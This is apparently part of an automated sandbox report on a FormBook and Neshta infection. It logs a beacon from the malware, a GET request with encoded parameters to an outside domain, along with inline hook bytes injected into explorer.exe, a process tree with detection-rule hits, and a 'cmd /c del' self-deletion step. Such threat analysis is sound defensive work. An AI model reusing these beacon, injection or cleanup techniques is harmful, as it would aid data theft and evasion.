                                                                                                                        gdi32.dllStretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
                                                                                                                        user32.dllReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
                                                                                                                        shell32.dllShellExecuteA, ExtractIconA

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        RussianRussia

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        06/10/21-20:54:57.211914TCP1201ATTACK-RESPONSES 403 Forbidden804975334.102.136.180192.168.2.6

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 10, 2021 20:54:57.030077934 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.072468996 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.072818995 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.072968960 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.116158962 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.211914062 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.211961985 CEST804975334.102.136.180192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:57.213359118 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.213489056 CEST4975380192.168.2.634.102.136.180
                                                                                                                        Jun 10, 2021 20:54:57.255644083 CEST804975334.102.136.180192.168.2.6

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 10, 2021 20:52:56.466655016 CEST5177453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:56.516782045 CEST53517748.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:52:57.555850029 CEST5602353192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:57.606200933 CEST53560238.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:52:58.671271086 CEST5838453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:58.729799986 CEST53583848.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:52:59.605499029 CEST6026153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:52:59.655922890 CEST53602618.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:00.397624016 CEST5606153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:00.450397968 CEST53560618.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:01.908998013 CEST5833653192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:01.959418058 CEST53583368.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:02.707798004 CEST5378153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:02.758057117 CEST53537818.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:03.849318981 CEST5406453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:03.899388075 CEST53540648.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:06.596693039 CEST5281153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:06.655294895 CEST53528118.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:07.859206915 CEST5529953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:07.921375036 CEST53552998.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:09.044658899 CEST6374553192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:09.104645014 CEST53637458.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:10.205240011 CEST5005553192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:10.258629084 CEST53500558.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:12.100763083 CEST6137453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:12.153758049 CEST53613748.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:13.241920948 CEST5033953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:13.294929028 CEST53503398.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:14.121953011 CEST6330753192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:14.183816910 CEST53633078.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:15.152836084 CEST4969453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:15.211072922 CEST53496948.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:16.731596947 CEST5498253192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:16.792953014 CEST53549828.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:30.056799889 CEST5001053192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:30.125757933 CEST53500108.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:51.309299946 CEST6371853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:51.369638920 CEST53637188.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:53:51.744307041 CEST6211653192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:53:51.818675995 CEST53621168.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:02.000946999 CEST6381653192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:02.061093092 CEST53638168.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:06.364775896 CEST5501453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:06.521516085 CEST53550148.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:07.205995083 CEST6220853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:07.366110086 CEST53622088.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:07.993515015 CEST5757453192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:08.060493946 CEST53575748.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:08.428529024 CEST5181853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:08.492145061 CEST53518188.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:09.036667109 CEST5662853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:09.098541021 CEST53566288.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:10.033778906 CEST6077853192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:10.095422983 CEST53607788.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:10.859957933 CEST5379953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:10.918298960 CEST53537998.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:11.751101017 CEST5468353192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:11.804127932 CEST53546838.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:12.925803900 CEST5932953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:12.979228973 CEST53593298.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:16.933178902 CEST6402153192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:16.994709015 CEST53640218.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:17.769121885 CEST5612953192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:17.828820944 CEST53561298.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:39.738754034 CEST5817753192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:39.799232960 CEST53581778.8.8.8192.168.2.6
                                                                                                                        Jun 10, 2021 20:54:56.943981886 CEST5070053192.168.2.68.8.8.8
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST53507008.8.8.8192.168.2.6

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Jun 10, 2021 20:54:56.943981886 CEST192.168.2.68.8.8.80x2681Standard query (0)www.agileintelligence.coachA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST8.8.8.8192.168.2.60x2681No error (0)www.agileintelligence.coachagileintelligence.coachCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 10, 2021 20:54:57.021190882 CEST8.8.8.8192.168.2.60x2681No error (0)agileintelligence.coach34.102.136.180A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • www.agileintelligence.coach

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.2.64975334.102.136.18080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Jun 10, 2021 20:54:57.072968960 CEST5532OUTGET /xkcp/?6lS0=KFNDChppd2b&f2JL=SStynINVP5NCGh+2RJURYBVhcUSlPPhp5T3GlTJ0osry6C6vZ7yRpdLEbpP0cRdR/S5JjqUiIQ== HTTP/1.1
                                                                                                                        Host: www.agileintelligence.coach
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Jun 10, 2021 20:54:57.211914062 CEST5533INHTTP/1.1 403 Forbidden
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 10 Jun 2021 18:54:57 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 275
                                                                                                                        ETag: "60ba413e-113"
                                                                                                                        Via: 1.1 google
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                        Code Manipulations

                                                                                                                        User Modules

                                                                                                                        Hook Summary

                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                        PeekMessageAINLINEexplorer.exe
                                                                                                                        PeekMessageWINLINEexplorer.exe
                                                                                                                        GetMessageWINLINEexplorer.exe
                                                                                                                        GetMessageAINLINEexplorer.exe

                                                                                                                        Processes

                                                                                                                        Process: explorer.exe, Module: user32.dll
                                                                                                                        Function NameHook TypeNew Data
                                                                                                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                                                                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                                                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                                                                        GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                                                                                        Statistics

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        Analysis Process: vi0EwpbUht.exe PID: 7096 Parent PID: 6088

                                                                                                                        General

                                                                                                                        Start time:20:53:02
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\Desktop\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\Desktop\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:284661 bytes
                                                                                                                        MD5 hash:F478C15F5AFFD8359762B8C6B0E913A4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: vi0EwpbUht.exe PID: 6184 Parent PID: 7096

                                                                                                                        General

                                                                                                                        Start time:20:53:04
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: vi0EwpbUht.exe PID: 6372 Parent PID: 6184

                                                                                                                        General

                                                                                                                        Start time:20:53:05
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: explorer.exe PID: 3440 Parent PID: 6372

                                                                                                                        General

                                                                                                                        Start time:20:53:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:
                                                                                                                        Imagebase:0x7ff6f22f0000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: svchost.com PID: 3728 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:20:53:16
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\svchost.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:41472 bytes
                                                                                                                        MD5 hash:713C9023AF9454658983BDEEC3B3F4D4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: elxhan.exe PID: 1144 Parent PID: 3728

                                                                                                                        General

                                                                                                                        Start time:20:53:17
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: elxhan.exe PID: 5572 Parent PID: 1144

                                                                                                                        General

                                                                                                                        Start time:20:53:21
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        Analysis Process: NETSTAT.EXE PID: 5948 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:20:54:05
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Imagebase:0xe0000
                                                                                                                        File size:32768 bytes
                                                                                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        Analysis Process: cmd.exe PID: 4140 Parent PID: 5948

                                                                                                                        General

                                                                                                                        Start time:20:54:10
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x2a0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: conhost.exe PID: 4592 Parent PID: 4140

                                                                                                                        General

                                                                                                                        Start time:20:54:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Analysis Process: help.exe PID: 5944 Parent PID: 3440

                                                                                                                        General

                                                                                                                        Start time:20:54:47
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\help.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                        Imagebase:0x10a0000
                                                                                                                        File size:10240 bytes
                                                                                                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                        Reset < >